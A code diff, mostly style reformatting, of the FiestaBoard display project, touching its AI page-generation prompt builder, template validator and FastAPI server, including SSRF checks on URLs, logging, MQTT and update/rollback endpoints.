+        f'    - `alignment`: "left" | "center" | "right" (no\n'
+        f'      "justify"). Drives how the line is positioned within\n'
         f"      the {cols}-column row.\n"
         f"    - `wrap`: boolean. When true, content longer than {cols}\n"
         f"      columns flows onto subsequent rows; the wrapped lines\n"
@@ -494,7 +484,7 @@ def build_prompt(
         "EXPRESSIONS / FORMULAS\n"
         "- Inline formula syntax: `{{= expression }}`. The expression is\n"
         "  evaluated at render time and replaced by its result. Example:\n"
-        "    `{{= IF(weather.temperature > 80, \"HOT\", \"OK\") }}`\n"
+        '    `{{= IF(weather.temperature > 80, "HOT", "OK") }}`\n'
         "- Inside a formula, reference variables by their plain dotted\n"
         "  path (no surrounding `{{ }}`): `weather.temperature`,\n"
         "  `date_time.hour`, etc. Only variables listed in AVAILABLE\n"
@@ -503,22 +493,20 @@ def build_prompt(
         "    arithmetic: + - * / %\n"
         "    comparison: =  ==  !=  <>  <  >  <=  >=\n"
         "    logical:    AND  OR  NOT  (also && || !)\n"
-        "    string:     &  (concatenation, e.g. \"H\" & \"I\" -> \"HI\")\n"
-        "- String literals use double quotes: \"text\". `{` and `}` may\n"
+        '    string:     &  (concatenation, e.g. "H" & "I" -> "HI")\n'
+        '- String literals use double quotes: "text". `{` and `}` may\n'
         "  not appear inside an expression body.\n"
         "- Errors short-circuit (e.g. divide-by-zero -> `#DIV/0`,\n"
         "  missing variable -> `#REF`). Wrap risky lookups with\n"
         "  `IFERROR(expr, fallback)` or `DEFAULT(expr, fallback)` to\n"
         "  render a sane value instead.\n"
-        "- Built-in functions (uppercase, no space before parens):\n"
-        + _format_builtins()
-        + "\n"
+        "- Built-in functions (uppercase, no space before parens):\n" + _format_builtins() + "\n"
         "- Examples:\n"
-        "    `{{= IF(weather.temperature > 80, \"HOT\", \"MILD\") }}`\n"
-        "    `{{= ROUND(weather.temperature) & \"F\" }}`\n"
-        "    `{{= IFERROR(weather.temperature, \"--\") }}`\n"
+        '    `{{= IF(weather.temperature > 80, "HOT", "MILD") }}`\n'
+        '    `{{= ROUND(weather.temperature) & "F" }}`\n'
+        '    `{{= IFERROR(weather.temperature, "--") }}`\n'
         "    `{{= UPPER(LEFT(weather.condition, 6)) }}`\n"
-        "    `{{= COLOR(IF(weather.temperature > 80, \"red\", \"blue\")) }}`\n"
+        '    `{{= COLOR(IF(weather.temperature > 80, "red", "blue")) }}`\n'
         "- Limitations: no user-defined functions, no loops, no\n"
         "  arbitrary code. Prefer plain `{{plugin.field}}` substitution\n"
         "  when no logic is required — only reach for `{{= ... }}` when\n"
@@ -529,16 +517,14 @@ def build_prompt(
         output_rules = (
             "OUTPUT\n"
             "Return ONLY a single JSON object that matches this schema. Do\n"
-            "not include markdown, comments, or extra prose:\n"
-            + json.dumps(_OUTPUT_SCHEMA, indent=2)
-            + "\n\nRules:\n"
+            "not include markdown, comments, or extra prose:\n" + json.dumps(_OUTPUT_SCHEMA, indent=2) + "\n\nRules:\n"
             "- Only use variables that appear in the AVAILABLE VARIABLES\n"
             "  section above. Do not invent plugin or field names.\n"
             "- If the user requests something that requires a variable\n"
             "  that does not exist, prefer plain static text or omit that\n"
             "  detail.\n"
-            f"- `device_type` must be \"{device_type}\".\n"
-            "- `type` must be \"template\".\n"
+            f'- `device_type` must be "{device_type}".\n'
+            '- `type` must be "template".\n'
         )
     else:
         # Chat mode appends its own tool-grammar addendum after this
@@ -556,7 +542,7 @@ def build_prompt(
             "  or summarize your own actions after every block.\n"
             "- Only use variables listed in AVAILABLE VARIABLES above.\n"
             "  Do not invent plugin or field names.\n"
-            f"- Pages you propose must target device_type \"{device_type}\".\n"
+            f'- Pages you propose must target device_type "{device_type}".\n'
         )
 
     exemplars_block = json.dumps(
@@ -575,17 +561,13 @@ def build_prompt(
 
     pages_section = ""
     if available_pages is not None:
-        pages_section = (
-            "\n\nAVAILABLE PAGES (pages the user can navigate to):\n"
-            + _format_available_pages(available_pages)
+        pages_section = "\n\nAVAILABLE PAGES (pages the user can navigate to):\n" + _format_available_pages(
+            available_pages
         )
 
     plugins_section = ""
     if installed_plugins is not None:
-        plugins_section = (
-            "\n\nINSTALLED PLUGINS:\n"
-            + _format_installed_plugins(installed_plugins)
-        )
+        plugins_section = "\n\nINSTALLED PLUGINS:\n" + _format_installed_plugins(installed_plugins)
 
     schedules_section = ""
     if available_schedules is not None:
@@ -605,8 +587,7 @@ def build_prompt(
     if registry_plugins is not None:
         registry_section = (
             "\n\nPLUGIN REGISTRY (plugins available to install; use the `id` "
-            "field as plugin_id when proposing install_plugin):\n"
-            + _format_registry_plugins(registry_plugins)
+            "field as plugin_id when proposing install_plugin):\n" + _format_registry_plugins(registry_plugins)
         )
 
     scope_intro = (
@@ -623,15 +604,13 @@ def build_prompt(
     )
     if mode == "generate":
         scope_rules = (
-            scope_intro
-            + "If the user's request is off-topic, output ONLY this JSON\n"
+            scope_intro + "If the user's request is off-topic, output ONLY this JSON\n"
             "object (no page, no prose):\n"
             '  {"refusal": true, "reason": "<one sentence why + what you can help with>"}\n'
         )
     else:
         scope_rules = (
-            scope_intro
-            + "If the user's request is off-topic, reply with a brief,\n"
+            scope_intro + "If the user's request is off-topic, reply with a brief,\n"
             "friendly message explaining that you only help with\n"
             "FiestaBoard, and ask what they would like to show on their\n"
             "board. Do not emit any tool block in that case.\n"

--- a/src/ai/template_validator.py
+++ b/src/ai/template_validator.py
@@ -90,7 +90,7 @@ def _looks_like_color_with_trailing_punct(arg: str) -> tuple[bool, str, str]:
     if stripped == arg:
         return False, "", ""
     if stripped.lower() in _COLOR_NAMES:
-        return True, stripped, arg[len(stripped):]
+        return True, stripped, arg[len(stripped) :]
     return False, "", ""
 
 
@@ -179,10 +179,7 @@ def _repair_line(line: str, idx: int) -> tuple[str, list[str]]:
         # block in stray whitespace, normalise to the canonical form
         # so downstream regex-based passes (and rendering) work.
         if match.group(0) != canonical:
-            warnings.append(
-                f"Line {line_no}: normalised whitespace in "
-                f"`{match.group(0)}` to `{canonical}`."
-            )
+            warnings.append(f"Line {line_no}: normalised whitespace in `{match.group(0)}` to `{canonical}`.")
             return canonical
         return match.group(0)
 

--- a/src/api_server.py
+++ b/src/api_server.py
@@ -99,7 +99,9 @@ def _validate_request_url(
     if not parsed.hostname:
         raise HTTPException(status_code=400, detail="URL is missing a host")
     if parsed.username is not None or parsed.password is not None:
-        raise HTTPException(status_code=400, detail="URL must not contain credentials")
+        raise HTTPException(
+            status_code=400, detail="URL must not contain credentials"
+        )
     # Block requests targeting private/loopback/link-local addresses to
     # prevent SSRF against internal services.
     _h = parsed.hostname.lower().rstrip(".")
@@ -110,7 +112,13 @@ def _validate_request_url(
         )
     try:
         _addr = ipaddress.ip_address(_h)
-        if _addr.is_private or _addr.is_loopback or _addr.is_link_local or _addr.is_reserved or _addr.is_multicast:
+        if (
+            _addr.is_private
+            or _addr.is_loopback
+            or _addr.is_link_local
+            or _addr.is_reserved
+            or _addr.is_multicast
+        ):
             raise HTTPException(
                 status_code=400,
                 detail="URL must not target internal network resources",
@@ -119,7 +127,7 @@ def _validate_request_url(
         pass  # Not an IP literal; hostname-based domains are permitted
 
     host = parsed.hostname.strip().lower()
-    if host == "localhost" or host.endswith((".localhost", ".local")):
+    if host == "localhost" or host.endswith(".localhost") or host.endswith(".local"):
         raise HTTPException(status_code=400, detail="URL host is not allowed")
 
     def _is_non_public_ip(ip_str: str) -> bool:
@@ -166,7 +174,10 @@ def _get_generic_data_allowed_hosts() -> list[str]:
 def _is_host_allowed(host: str, allowed_hosts: list[str]) -> bool:
     """Check whether host is exactly allowed or a subdomain of an allowed host."""
     h = (host or "").strip().lower().rstrip(".")
-    return any(h == allowed or h.endswith("." + allowed) for allowed in allowed_hosts)
+    for allowed in allowed_hosts:
+        if h == allowed or h.endswith("." + allowed):
+            return True
+    return False
 
 
 # Hostnames are restricted to RFC 1123 labels (letters, digits, hyphens) and
@@ -189,8 +200,6 @@ def _sanitize_optional_plugin_id(plugin_id: str | None) -> str | None:
             detail="plugin_id may contain only lowercase letters, digits, and underscores",
         )
     return plugin_id
-
-
 # IPv4 dotted-quad notation.  This rejects exotic forms (URL-encoded chars,
 # ``user:pass@host``, schemes embedded in the host, etc.) before we ever try
 # to connect to a board over HTTP.
@@ -242,7 +251,11 @@ def _validate_board_host_is_local_network(host: str) -> None:
     import socket
 
     def _is_allowed_ipv4(addr: ipaddress.IPv4Address) -> bool:
-        return addr.is_private or addr.is_loopback or addr.is_link_local
+        return (
+            addr.is_private
+            or addr.is_loopback
+            or addr.is_link_local
+        )
 
     try:
         ip = ipaddress.IPv4Address(host)
@@ -260,7 +273,11 @@ def _validate_board_host_is_local_network(host: str) -> None:
     except socket.gaierror:
         raise HTTPException(status_code=400, detail="host could not be resolved") from None
 
-    resolved_ips = {ipaddress.IPv4Address(info[4][0]) for info in addrinfo if info and len(info) >= 5 and info[4]}
+    resolved_ips = {
+        ipaddress.IPv4Address(info[4][0])
+        for info in addrinfo
+        if info and len(info) >= 5 and info[4]
+    }
     if not resolved_ips:
         raise HTTPException(status_code=400, detail="host did not resolve to an IPv4 address")
 
@@ -283,18 +300,16 @@ _shutting_down = False  # Set during app shutdown to suppress auto-restart
 _log_buffer: deque = deque(maxlen=500)
 _log_lock = threading.Lock()
 
-
 def _create_log_entry(record: logging.LogRecord, formatted_message: str) -> dict[str, Any]:
     """Create a structured log entry from a log record with UTC timestamp."""
     from .time_service import get_time_service
-
     time_service = get_time_service()
 
     return {
         "timestamp": time_service.create_utc_timestamp(),
         "level": record.levelname,
         "logger": record.name,
-        "message": formatted_message,
+        "message": formatted_message
     }
 
 
@@ -317,7 +332,7 @@ class JSONFileHandler(logging.handlers.RotatingFileHandler):
         try:
             log_entry = _create_log_entry(record, self.format(record))
             # Write as JSON line
-            msg = json.dumps(log_entry) + "\n"
+            msg = json.dumps(log_entry) + '\n'
             stream = self.stream
             stream.write(msg)
             self.flush()
@@ -346,9 +361,12 @@ def _setup_file_logging():
 
         # Create JSON file handler with rotation
         file_handler = JSONFileHandler(
-            str(LOG_FILE), maxBytes=LOG_MAX_BYTES, backupCount=LOG_BACKUP_COUNT, encoding="utf-8"
+            str(LOG_FILE),
+            maxBytes=LOG_MAX_BYTES,
+            backupCount=LOG_BACKUP_COUNT,
+            encoding='utf-8'
         )
-        file_handler.setFormatter(logging.Formatter("%(message)s"))
+        file_handler.setFormatter(logging.Formatter('%(message)s'))
         file_handler.setLevel(logging.INFO)
 
         # Add to root logger
@@ -359,7 +377,10 @@ def _setup_file_logging():
 
 
 def _read_logs_from_files(
-    limit: int = 100, offset: int = 0, level: str | None = None, search: str | None = None
+    limit: int = 100,
+    offset: int = 0,
+    level: str | None = None,
+    search: str | None = None
 ) -> tuple[list[dict[str, Any]], int, bool]:
     """
     Read logs from log files with filtering and pagination.
@@ -380,7 +401,7 @@ def _read_logs_from_files(
         if not log_file.exists():
             continue
         try:
-            with log_file.open(encoding="utf-8") as f:
+            with open(log_file, encoding='utf-8') as f:
                 lines = f.readlines()
                 for line in reversed(lines):
                     line = line.strip()
@@ -404,13 +425,13 @@ def _read_logs_from_files(
     merged_logs = []
 
     for log in reversed(memory_logs):
-        key = (log.get("timestamp"), log.get("message"))
+        key = (log.get('timestamp'), log.get('message'))
         if key not in seen:
             seen.add(key)
             merged_logs.append(log)
 
     for log in all_logs:
-        key = (log.get("timestamp"), log.get("message"))
+        key = (log.get('timestamp'), log.get('message'))
         if key not in seen:
             seen.add(key)
             merged_logs.append(log)
@@ -420,14 +441,14 @@ def _read_logs_from_files(
 
     if level:
         level_upper = level.upper()
-        filtered_logs = [log for log in filtered_logs if log.get("level") == level_upper]
+        filtered_logs = [log for log in filtered_logs if log.get('level') == level_upper]
 
     if search:
         search_lower = search.lower()
         filtered_logs = [
-            log
-            for log in filtered_logs
-            if search_lower in log.get("message", "").lower() or search_lower in log.get("logger", "").lower()
+            log for log in filtered_logs
+            if search_lower in log.get('message', '').lower() or
+               search_lower in log.get('logger', '').lower()
         ]
 
     total_matching = len(filtered_logs)
@@ -443,13 +464,11 @@ def _read_logs_from_files(
 
 class MessageRequest(BaseModel):
     """Request model for sending a custom message."""
-
     text: str
 
 
 class StatusResponse(BaseModel):
     """Response model for service status."""
-
     running: bool
     initialized: bool
     config_summary: dict[str, Any]
@@ -457,7 +476,6 @@ class StatusResponse(BaseModel):
 
 class HealthResponse(BaseModel):
     """Response model for health check."""
-
     status: str
     service_running: bool
     version: str
@@ -465,7 +483,6 @@ class HealthResponse(BaseModel):
 
 class VersionResponse(BaseModel):
     """Response model for version information."""
-
     package_version: str
     build_version: str
     is_dev: bool
@@ -474,7 +491,6 @@ class VersionResponse(BaseModel):
 
 class UpdateCheckResponse(BaseModel):
     """Response model for update check."""
-
     current_version: str
     latest_version: str | None
     update_available: bool
@@ -485,7 +501,6 @@ class UpdateCheckResponse(BaseModel):
 
 class UpdateStatusResponse(BaseModel):
     """Response model for system update status (sidecar availability + auto-update flag)."""
-
     updater_available: bool
     auto_update_enabled: bool  # derived: True when interval != "manual"
     auto_update_interval: str  # "daily" | "weekly" | "monthly" | "manual"
@@ -515,7 +530,6 @@ class UpdateStatusResponse(BaseModel):
 
 class UpdateApplyResponse(BaseModel):
     """Response model for triggering an update."""
-
     status: str  # "queued" | "manual"
     mode: str  # "sidecar" | "manual"
     previous_digest: str | None = None
@@ -542,7 +556,6 @@ class RollbackRequest(BaseModel):
     * ``restore_image`` — when False, only the settings are rolled back
       (image is left untouched).  Defaults to True.
     """
-
     snapshot: str | None = None
     restore_settings: bool = True
     restore_image: bool = True
@@ -550,7 +563,6 @@ class RollbackRequest(BaseModel):
 
 class RollbackResponse(BaseModel):
     """Response model for the user-initiated rollback endpoint."""
-
     status: str  # "success" | "queued" | "partial"
     snapshot: str | None = None
     image_rollback: dict[str, Any] | None = None  # {target_digest, target_image, queued} or None
@@ -566,23 +578,20 @@ class AutoUpdateRequest(BaseModel):
     is mapped to the install's default interval and False is mapped to
     ``manual``.  At least one of the two must be provided.
     """
-
     enabled: bool | None = None
     interval: str | None = None
 
 
 class AutoUpdateResponse(BaseModel):
     """Response model for auto-update toggle."""
-
     enabled: bool  # derived: True when interval != "manual"
     interval: str  # "daily" | "weekly" | "monthly" | "manual"
 
 
 class SystemActionResponse(BaseModel):
     """Response model for restart / shutdown system actions."""
-
-    status: str  # "queued"
-    action: str  # "restart" | "shutdown"
+    status: str   # "queued"
+    action: str   # "restart" | "shutdown"
 
 
 # ── WiFi / NetworkManager models ─────────────────────────────────────────────
@@ -645,7 +654,6 @@ async def lifespan(app: FastAPI):
     _mcp_ctx = None
     try:
         from .mcp_server import mcp_server as _mcp_for_lifespan
-
         if _mcp_for_lifespan is not None:
             _mcp_ctx = _mcp_for_lifespan.session_manager.run()
     except Exception as _mcp_exc:  # pragma: no cover — defensive
@@ -677,9 +685,7 @@ async def lifespan(app: FastAPI):
             if _service_running:
                 logger.info("Background service auto-started successfully")
             else:
-                logger.warning(
-                    "Background service failed to start - likely due to configuration issues. Use the /start endpoint or UI to start it manually after fixing configuration."
-                )
+                logger.warning("Background service failed to start - likely due to configuration issues. Use the /start endpoint or UI to start it manually after fixing configuration.")
         except Exception as e:
             logger.error(f"Failed to auto-start background service: {e}", exc_info=True)
             logger.warning("Service can be started manually via /start endpoint after configuration is fixed")
@@ -689,10 +695,8 @@ async def lifespan(app: FastAPI):
     # Start mDNS/Bonjour advertisement (fiestaboard.local)
     try:
         from .system.mdns import start_mdns
-
         if start_mdns():
             from .system.mdns import get_mdns_service
-
             logger.info("Access FiestaBoard at %s", get_mdns_service().local_url)
     except Exception as e:
         logger.warning(f"mDNS service could not be started: {e}")
@@ -700,7 +704,6 @@ async def lifespan(app: FastAPI):
     # Start MQTT client for Home Assistant discovery/control (optional)
     try:
         from .settings.service import get_settings_service
-
         mqtt_cfg = get_settings_service().get_mqtt_settings()
         if mqtt_cfg.enabled:
             _apply_mqtt_config(mqtt_cfg)
@@ -721,7 +724,9 @@ async def lifespan(app: FastAPI):
                 try:
                     if PLUGIN_SYSTEM_AVAILABLE:
                         registry = get_plugin_registry()
-                        results = await _asyncio.get_event_loop().run_in_executor(None, registry.check_for_updates)
+                        results = await _asyncio.get_event_loop().run_in_executor(
+                            None, registry.check_for_updates
+                        )
                         updates = [p for p, v in results.items() if v]
                         if updates:
                             auto_update = get_settings_service().get_plugin_settings().auto_update
@@ -749,7 +754,6 @@ async def lifespan(app: FastAPI):
     # the user having to open Settings and click Refresh.
     system_update_task = None
     try:
-
         async def _system_update_check_loop():
             # Tick once an hour.  Even on the longest interval (monthly) this
             # is plenty granular and keeps the work the loop does tiny.
@@ -801,7 +805,6 @@ async def lifespan(app: FastAPI):
     # Stop MQTT client
     try:
         from .mqtt import get_mqtt_client, set_mqtt_client_instance
-
         mqtt_client = get_mqtt_client()
         if mqtt_client:
             mqtt_client.stop()
@@ -813,7 +816,6 @@ async def lifespan(app: FastAPI):
     # Stop mDNS advertisement
     try:
         from .system.mdns import stop_mdns
-
         stop_mdns()
     except Exception:
         logger.debug("Failed to stop mDNS during shutdown", exc_info=True)
@@ -845,7 +847,6 @@ app.add_middleware(
 # Gracefully skipped if the mcp package is not installed.
 try:
     from .mcp_server import mcp_server as _mcp_server_instance
-
     if _mcp_server_instance is not None:
         app.mount("/mcp", _mcp_server_instance.streamable_http_app())
         logger.info("FiestaBoard MCP server mounted at /mcp (public: /api/mcp)")
@@ -863,12 +864,14 @@ app.include_router(auth_router)
 if is_auth_enabled():
     logger.info("Authentication is ENABLED (FIESTABOARD_AUTH_ENABLED=true)")
 else:
-    logger.info("Authentication is disabled (set FIESTABOARD_AUTH_ENABLED=true to require login)")
+    logger.info(
+        "Authentication is disabled (set FIESTABOARD_AUTH_ENABLED=true to require login)"
+    )
 
 
 # Set up log buffer handler
 log_buffer_handler = LogBufferHandler()
-log_buffer_handler.setFormatter(logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s"))
+log_buffer_handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
 logging.getLogger().addHandler(log_buffer_handler)
 
 
@@ -881,9 +884,7 @@ def get_service() -> DisplayService | None:
                 try:
                     _service = DisplayService()
                     if not _service.initialize():
-                        logger.warning(
-                            "Service initialization failed - service can be started later when configuration is fixed"
-                        )
+                        logger.warning("Service initialization failed - service can be started later when configuration is fixed")
                         # Keep the service instance but mark it as uninitialized
                         # This allows the /start endpoint to retry initialization
                         return _service
@@ -968,14 +969,22 @@ def stop_display_service_sync() -> bool:
 @app.get("/", response_model=dict[str, str])
 async def root():
     """Root endpoint with API information."""
-    return {"name": "FiestaBoard Display API", "version": "1.0.0", "status": "running"}
+    return {
+        "name": "FiestaBoard Display API",
+        "version": "1.0.0",
+        "status": "running"
+    }
 
 
 @app.api_route("/health", methods=["GET", "HEAD"], response_model=HealthResponse)
 async def health():
     """Health check endpoint."""
     service = get_service()
-    return HealthResponse(status="ok", service_running=_service_running and service is not None, version=__version__)
+    return HealthResponse(
+        status="ok",
+        service_running=_service_running and service is not None,
+        version=__version__
+    )
 
 
 @app.get("/mqtt/status")
@@ -988,7 +997,6 @@ async def get_mqtt_status():
     """
     try:
         from .mqtt import get_mqtt_client
-
         client = get_mqtt_client()
         if client is None:
             return {"enabled": False, "connected": False, "running": False}
@@ -1011,7 +1019,6 @@ async def mqtt_republish_discovery():
     """
     try:
         from .mqtt import get_mqtt_client
-
         client = get_mqtt_client()
         if client is None or not client.is_connected():
             raise HTTPException(status_code=503, detail="MQTT client not connected")
@@ -1041,7 +1048,6 @@ def _apply_mqtt_config(mqtt_cfg) -> None:
         return
 
     from .mqtt.config import MQTTConfig
-
     config = MQTTConfig(
         enabled=mqtt_cfg.enabled,
         broker_host=mqtt_cfg.broker_host,
@@ -1077,7 +1083,6 @@ def _apply_mqtt_config(mqtt_cfg) -> None:
 async def get_mqtt_settings():
     """Return current MQTT integration settings (password masked)."""
     from .settings.service import get_settings_service
-
     s = get_settings_service().get_mqtt_settings()
     return s.to_dict(mask_secrets=True)
 
@@ -1092,7 +1097,6 @@ async def update_mqtt_settings(request: Request):
     """
     body = await request.json()
     from .settings.service import get_settings_service
-
     svc = get_settings_service()
     updated = svc.set_mqtt_settings(body)
     _apply_mqtt_config(updated)
@@ -1125,7 +1129,10 @@ def _ai_generate_throttle_check() -> None:
         if wait > 0:
             raise HTTPException(
                 status_code=429,
-                detail=("AI generation is rate-limited. Please wait a moment and try again."),
+                detail=(
+                    "AI generation is rate-limited. Please wait a moment "
+                    "and try again."
+                ),
             )
         _ai_generate_last_call = now
 
@@ -1204,11 +1211,14 @@ async def test_ai_provider(request: Request):
                 )
         else:
             default_id = block.get("default_provider_id")
-            provider = (cm.get_ai_provider(default_id) if default_id else None) or block["providers"][0]
+            provider = (
+                cm.get_ai_provider(default_id) if default_id else None
+            ) or block["providers"][0]
 
     from .ai.generator import test_provider as ai_test_provider
 
-    return await ai_test_provider(provider, model=model)
+    result = await ai_test_provider(provider, model=model)
+    return result
 
 
 @app.get("/pages/ai/context")
@@ -1265,9 +1275,13 @@ async def generate_ai_page(request: Request):
     if not isinstance(prompt, str) or not prompt.strip():
         raise HTTPException(status_code=400, detail="`prompt` is required.")
     if device_type not in ("flagship", "note"):
-        raise HTTPException(status_code=400, detail=f"Invalid device_type: {device_type!r}")
+        raise HTTPException(
+            status_code=400, detail=f"Invalid device_type: {device_type!r}"
+        )
     if current_page is not None and not isinstance(current_page, dict):
-        raise HTTPException(status_code=400, detail="`current_page` must be an object.")
+        raise HTTPException(
+            status_code=400, detail="`current_page` must be an object."
+        )
 
     cm = get_config_manager()
     providers_block = cm.get_ai_providers()
@@ -1299,7 +1313,9 @@ async def generate_ai_page(request: Request):
         logger.exception("Unexpected error in /pages/ai/generate")
         raise HTTPException(
             status_code=500,
-            detail=("Unexpected AI generation error. See server logs for details."),
+            detail=(
+                "Unexpected AI generation error. See server logs for details."
+            ),
         ) from None
 
     return result
@@ -1361,21 +1377,37 @@ async def chat_ai_page(request: Request):
         )
 
     if not isinstance(messages, list) or not messages:
-        raise HTTPException(status_code=400, detail="`messages` must be a non-empty array.")
+        raise HTTPException(
+            status_code=400, detail="`messages` must be a non-empty array."
+        )
     if device_type not in ("flagship", "note"):
-        raise HTTPException(status_code=400, detail=f"Invalid device_type: {device_type!r}")
+        raise HTTPException(
+            status_code=400, detail=f"Invalid device_type: {device_type!r}"
+        )
     if current_page is not None and not isinstance(current_page, dict):
-        raise HTTPException(status_code=400, detail="`current_page` must be an object.")
+        raise HTTPException(
+            status_code=400, detail="`current_page` must be an object."
+        )
     if available_pages is not None and not isinstance(available_pages, list):
-        raise HTTPException(status_code=400, detail="`available_pages` must be an array.")
+        raise HTTPException(
+            status_code=400, detail="`available_pages` must be an array."
+        )
     if installed_plugins is not None and not isinstance(installed_plugins, list):
-        raise HTTPException(status_code=400, detail="`installed_plugins` must be an array.")
+        raise HTTPException(
+            status_code=400, detail="`installed_plugins` must be an array."
+        )
     if available_schedules is not None and not isinstance(available_schedules, list):
-        raise HTTPException(status_code=400, detail="`available_schedules` must be an array.")
+        raise HTTPException(
+            status_code=400, detail="`available_schedules` must be an array."
+        )
     if available_carousels is not None and not isinstance(available_carousels, list):
-        raise HTTPException(status_code=400, detail="`available_carousels` must be an array.")
+        raise HTTPException(
+            status_code=400, detail="`available_carousels` must be an array."
+        )
     if registry_plugins is not None and not isinstance(registry_plugins, list):
-        raise HTTPException(status_code=400, detail="`registry_plugins` must be an array.")
+        raise HTTPException(
+            status_code=400, detail="`registry_plugins` must be an array."
+        )
 
     cm = get_config_manager()
     providers_block = cm.get_ai_providers()
@@ -1394,7 +1426,9 @@ async def chat_ai_page(request: Request):
         try:
             await _AI_GENERATE_SEMAPHORE.acquire()
         except Exception:
-            yield _format_sse_event("error", {"message": "Could not acquire AI lock."})
+            yield _format_sse_event(
+                "error", {"message": "Could not acquire AI lock."}
+            )
             return
         try:
             try:
@@ -1419,7 +1453,12 @@ async def chat_ai_page(request: Request):
                 logger.exception("Unexpected error in /pages/ai/chat")
                 yield _format_sse_event(
                     "error",
-                    {"message": ("Unexpected AI chat error. See server logs for details.")},
+                    {
+                        "message": (
+                            "Unexpected AI chat error. See server logs for "
+                            "details."
+                        )
+                    },
                 )
         finally:
             _AI_GENERATE_SEMAPHORE.release()
@@ -1490,7 +1529,9 @@ def _collect_plugin_demos() -> list[dict[str, Any]]:
                     "name": getattr(demo, "name", plugin_id),
                     "device_type": getattr(demo, "device_type", "flagship"),
                     "template": list(getattr(demo, "template", []) or []),
-                    "line_metadata": list(getattr(demo, "line_metadata", []) or []),
+                    "line_metadata": list(
+                        getattr(demo, "line_metadata", []) or []
+                    ),
                     "duration_seconds": getattr(demo, "duration_seconds", 300),
                 }
             )
@@ -1508,7 +1549,7 @@ def _detect_hardware_model() -> str | None:
     UI suppresses the row when this returns None.
     """
     try:
-        with Path("/proc/device-tree/model").open("rb") as f:
+        with open("/proc/device-tree/model", "rb") as f:
             raw = f.read(256)
     except (FileNotFoundError, PermissionError, OSError):
         return None
@@ -1663,13 +1704,11 @@ def _is_newer_version(latest: str, current: str) -> bool:
     Handles version strings with varying component counts (e.g. "2.0" vs "2.0.1").
     """
     try:
-
         def parse_version(v: str):
             parts = v.split(".")
             if not parts or not all(p.isdigit() for p in parts):
                 raise ValueError(f"Invalid version: {v}")
             return tuple(int(x) for x in parts)
-
         return parse_version(latest) > parse_version(current)
     except (ValueError, AttributeError):
         return False
@@ -1888,7 +1927,9 @@ SETTINGS_SNAPSHOT_RETENTION = 5
 #: accept the exact ``pre-update-YYYYMMDDTHHMMSS[.fff]Z.json`` shape we
 #: produce (sub-second component optional for back-compat), so the restore
 #: endpoint cannot be coaxed into reading arbitrary files.
-_SETTINGS_SNAPSHOT_NAME_RE = re.compile(r"^pre-update-\d{8}T\d{6}(?:\.\d{3})?Z\.json$")
+_SETTINGS_SNAPSHOT_NAME_RE = re.compile(
+    r"^pre-update-\d{8}T\d{6}(?:\.\d{3})?Z\.json$"
+)
 
 
 def _take_settings_snapshot(
@@ -1915,7 +1956,6 @@ def _take_settings_snapshot(
     """
     try:
         from .backup.service import get_backup_service
-
         service = get_backup_service()
         document = service.export_to_json()
     except Exception:
@@ -2207,10 +2247,7 @@ async def system_update_apply():
     if resp.status_code == 401:
         raise HTTPException(
             status_code=500,
-            detail={
-                "status": "error",
-                "error": "fiestaupdater rejected our token; check FIESTAUPDATER_TOKEN matches in both services",
-            },
+            detail={"status": "error", "error": "fiestaupdater rejected our token; check FIESTAUPDATER_TOKEN matches in both services"},
         )
     if resp.status_code >= 400:
         raise HTTPException(
@@ -2316,7 +2353,9 @@ async def system_update_rollback(req: RollbackRequest):
         try:
             # Don't reinstall plugins from a settings-only snapshot: the user is
             # rolling back configuration, not reshaping their plugin set.
-            result = await asyncio.to_thread(service.import_from_json, raw, reinstall_plugins=False)
+            result = await asyncio.to_thread(
+                service.import_from_json, raw, reinstall_plugins=False
+            )
         except BackupError as e:
             raise HTTPException(
                 status_code=400,
@@ -2338,9 +2377,13 @@ async def system_update_rollback(req: RollbackRequest):
             # Old snapshot taken before we started annotating.  We can't
             # safely guess the digest, so report partial success rather
             # than guessing.
-            warnings.append("Snapshot does not record a previous image digest; image was not rolled back.")
+            warnings.append(
+                "Snapshot does not record a previous image digest; image was not rolled back."
+            )
         elif not _DIGEST_RE.fullmatch(digest) or not _IMAGE_REF_RE.fullmatch(image_ref):
-            warnings.append("Snapshot's recorded image identity is malformed; image was not rolled back.")
+            warnings.append(
+                "Snapshot's recorded image identity is malformed; image was not rolled back."
+            )
         elif not _updater_token():
             warnings.append(
                 "FIESTAUPDATER_TOKEN is not set; image rollback is unavailable. "
@@ -2379,10 +2422,7 @@ async def system_update_rollback(req: RollbackRequest):
             if resp.status_code >= 400:
                 raise HTTPException(
                     status_code=502,
-                    detail={
-                        "status": "error",
-                        "error": f"fiestaupdater returned {resp.status_code}: {resp.text[:200]}",
-                    },
+                    detail={"status": "error", "error": f"fiestaupdater returned {resp.status_code}: {resp.text[:200]}"},
                 )
 
             image_result = {
@@ -2418,7 +2458,10 @@ async def system_update_set_auto(req: AutoUpdateRequest):
         if req.interval not in AUTO_UPDATE_INTERVALS:
             raise HTTPException(
                 status_code=422,
-                detail=(f"Invalid interval {req.interval!r}; must be one of: {sorted(AUTO_UPDATE_INTERVALS.keys())}"),
+                detail=(
+                    f"Invalid interval {req.interval!r}; "
+                    f"must be one of: {sorted(AUTO_UPDATE_INTERVALS.keys())}"
+                ),
             )
         interval = req.interval
     elif req.enabled is not None:
@@ -2464,10 +2507,7 @@ def _handle_updater_response(resp: requests.Response, action: str) -> SystemActi
     if resp.status_code == 401:
         raise HTTPException(
             status_code=500,
-            detail={
-                "status": "error",
-                "error": "fiestaupdater rejected our token; check FIESTAUPDATER_TOKEN matches in both services",
-            },
+            detail={"status": "error", "error": "fiestaupdater rejected our token; check FIESTAUPDATER_TOKEN matches in both services"},
         )
     if resp.status_code >= 400:
         raise HTTPException(
@@ -2602,7 +2642,9 @@ async def wifi_connect(payload: WiFiConnectRequest):
     if not cap.available:
         raise _wifi_unavailable(cap.reason)
     try:
-        result = await svc.connect(ssid=payload.ssid, password=payload.password, hidden=payload.hidden)
+        result = await svc.connect(
+            ssid=payload.ssid, password=payload.password, hidden=payload.hidden
+        )
     except WiFiError as exc:
         raise _wifi_error(exc) from exc
     return WiFiConnectResponse(
@@ -2643,7 +2685,7 @@ async def get_logs(
     limit: int = Query(default=50, ge=1, le=500, description="Number of log entries to return"),
     offset: int = Query(default=0, ge=0, description="Offset for pagination"),
     level: str | None = Query(default=None, description="Filter by log level (DEBUG, INFO, WARNING, ERROR, CRITICAL)"),
